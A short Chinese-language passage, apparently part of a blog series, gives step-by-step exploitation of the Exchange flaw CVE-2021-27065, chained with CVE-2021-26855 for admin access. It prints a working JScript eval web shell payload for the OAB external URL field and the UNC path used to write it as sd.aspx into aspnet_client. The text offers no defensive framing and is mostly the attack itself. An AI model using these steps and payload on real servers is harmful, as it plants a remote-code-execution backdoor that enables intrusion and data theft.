接着昨天的说
CVE-2021–27065
CVE-2021–27065
是⼀个任意⽂件写⼊漏洞,它需要登陆的管理员账号权限才能触发。而CVE-2021–26855
正好可以为我们提供了管理员账号权限。
登录管理员账号后,进入:服务器——>虚拟目录——>OAB
编辑OAB配置,在外部链接中写⼊shell并保存。
http://aaa/<script language="JScript" runat="server">function Page_Load(){eval(Request["SD"],"unsafe");}</script>
保存后选择重置虚拟目录 写下shell位置为:\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\sd.aspx
查看shell文件,写入了一句话木马。